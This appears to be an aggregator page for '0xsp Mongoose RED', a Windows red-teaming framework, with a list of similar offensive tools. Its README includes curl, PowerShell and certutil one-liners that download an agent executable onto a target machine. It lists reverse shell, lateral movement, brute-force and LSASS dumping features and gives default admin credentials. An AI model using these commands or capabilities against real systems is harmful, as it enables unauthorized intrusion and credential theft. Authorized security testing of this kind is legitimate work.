All Projects → lawrenceamer → 0xsp Mongoose

lawrenceamer / 0xsp Mongoose

Licence: gpl-3.0
a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.

Programming Languages

pascal
1382 projects

Projects that are alternatives of or similar to 0xsp Mongoose

A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-8.83%)
Mutual labels:  security-tools, redteam, privilege-escalation
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+73.03%)
Mutual labels:  security-tools, security-audit, redteam
Wsltools
Web Scan Lazy Tools - Python Package
Stars: ✭ 288 (-31.26%)
Mutual labels:  security-tools, security-audit
Prowler
Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It contains more than 200 controls covering CIS, ISO27001, GDPR, HIPAA, SOC2, ENS and other security frameworks.
Stars: ✭ 4,561 (+988.54%)
Mutual labels:  security-tools, security-audit
Otseca
Open source security auditing tool to search and dump system configuration. It allows you to generate reports in HTML or RAW-HTML formats.
Stars: ✭ 416 (-0.72%)
Mutual labels:  security-tools, security-audit
Hellraiser
Vulnerability scanner using Nmap for scanning and correlating found CPEs with CVEs.
Stars: ✭ 413 (-1.43%)
Mutual labels:  security-tools, security-audit
Dgfraud
A Deep Graph-based Toolbox for Fraud Detection
Stars: ✭ 281 (-32.94%)
Mutual labels:  toolkit, security-tools
Ssh Mitm
ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation
Stars: ✭ 335 (-20.05%)
Mutual labels:  security-tools, security-audit
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (-79%)
Mutual labels:  privilege-escalation, redteam
Taipan
Web application vulnerability scanner
Stars: ✭ 359 (-14.32%)
Mutual labels:  security-tools, security-audit
Impost3r
👻Impost3r -- A linux password thief
Stars: ✭ 355 (-15.27%)
Mutual labels:  security-tools, redteam
W5
Security Orchestration, Automation and Response (SOAR) Platform. 安全编排与自动化响应平台,无需编写代码的安全自动化,使用 SOAR 可以让团队工作更加高效
Stars: ✭ 367 (-12.41%)
Mutual labels:  security-tools, security-audit
Salt Scanner
Linux vulnerability scanner based on Salt Open and Vulners audit API, with Slack notifications and JIRA integration
Stars: ✭ 261 (-37.71%)
Mutual labels:  security-tools, security-audit
Electriceye
Continuously monitor your AWS services for configurations that can lead to degradation of confidentiality, integrity or availability. All results will be sent to Security Hub for further aggregation and analysis.
Stars: ✭ 255 (-39.14%)
Mutual labels:  security-tools, security-audit
Traitor
⬆️ ☠️ Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, polkit, docker socket
Stars: ✭ 3,473 (+728.88%)
Mutual labels:  security-tools, privilege-escalation
MicrosoftWontFixList
A list of vulnerabilities or design flaws that Microsoft does not intend to fix. Since the number is growing, I decided to make a list. This list covers only vulnerabilities that came up in July 2021 (and SpoolSample ;-))
Stars: ✭ 854 (+103.82%)
Mutual labels:  security-tools, redteam
Raptor
Web-based Source Code Vulnerability Scanner
Stars: ✭ 314 (-25.06%)
Mutual labels:  security-tools, security-audit
Sherlock
This script is designed to help expedite a web application assessment by automating some of the assessment steps (e.g., running nmap, sublist3r, metasploit, etc.)
Stars: ✭ 36 (-91.41%)
Mutual labels:  security-audit, redteam
moonwalk
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚
Stars: ✭ 544 (+29.83%)
Mutual labels:  privilege-escalation, redteam
Super
Secure, Unified, Powerful and Extensible Rust Android Analyzer
Stars: ✭ 340 (-18.85%)
Mutual labels:  security-tools, security-audit

GPLv3 license

0xsp Mongoose RED for Windows

Current Release 2.2.0

0xsp mongoose red version is provided to assist your needs during cyber security simulation, by using this version you will be able to audit a targeted windows operation system for system vulnerabilities, misconfigurations and privilege escalation attacks and replicate the tactics and techniques of an advanced adversary in a network.

with node js support for web application API, it becomes much easier for installation and customization in timely manner, the windows sensor agent will communicate with application API to transfer results, and receive commands as bidirectional technique.

the agent is able to identify and detect windows exploits by using windows update api and exploit database definitions modules, the new release will detect also the following vulnerabilities.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472

Features

  • Windows Privilege escalation scanning techniques.
  • web application built with NodeJS
  • supports sqlite DB
  • Lateral movements techniques. video
  • Bidirectional communication channel. video
  • Plugins online packaging.
  • Enhanced exploit detecter scripting engine.
  • Windows Account Bruteforce Module (Local / Domain)
  • weaponization of run-as-user windows api function. Video
  • local network scanning and shares enumeration.
  • lsass memory dummping technique (plugin).

installation

git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

default access credentials :

  • username : admin
  • password : 0xsp

quick deploy of agent

#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Usage

-s --retrieve windows services and installed drivers.
-u --retrieve information about Users, groups, roles.
-c --search connected drivers for senstive config files by extension.
-n --retrieve network information,network interfaces, connection details.
-w --enumerate for writeable directories, access permission Check, modified permissions.
-i --enumerate windows system information, Sessions, Always elvated check.
-l --search in any file for specific string , ex : agent.exe -l c:\ password *.config.
-o --specify host address of nodejs application , you can use srvhost also
-p --enumerate installed Softwares, Running Processes, Tasks.
-e --kernel inspection Tool, it will help to search through tool databases for windows kernel vulnerabilities
-x --password to authorize your connection with node js application.
-d --download Files directly into target machine.
-t --upload Files From target machine into node js application.
-m --run all known scan Types together.

[!] RED TEAMING TACTICS SECTION

-r --spawn a reverse shell with specific account.
-lr --Lateral movement technique using WMI (e.g -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --network discovery and share enumeration
-cmd --transfer commands via HTTP Shell
-interactive --starting interactive mode (eg : loading plugins ..etc)
-username --identity authentication for specific attack modules.
-password --identity authentication for specific attack modules.
-host --identify remote host to conduct an attack to.
-srvhost --set rhost of node js application.
-bf --local users / domain users bruteforce module
-import --import and execute dll file locally
-remote --import and execute dll file from remote host

Documentations

https://0xsp.com/security%20dev/0xsp-mongoose-red

detailed research site

https://0xsp.com

Security Conferences

contribution

the project is opensourced and has been built with Lazarus IDE, you are welcomed to suggest any ideas or reporting bugs

tool tutorials

make sure to subscribe into the following channel to be notified when new tutorial and tricks published for 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].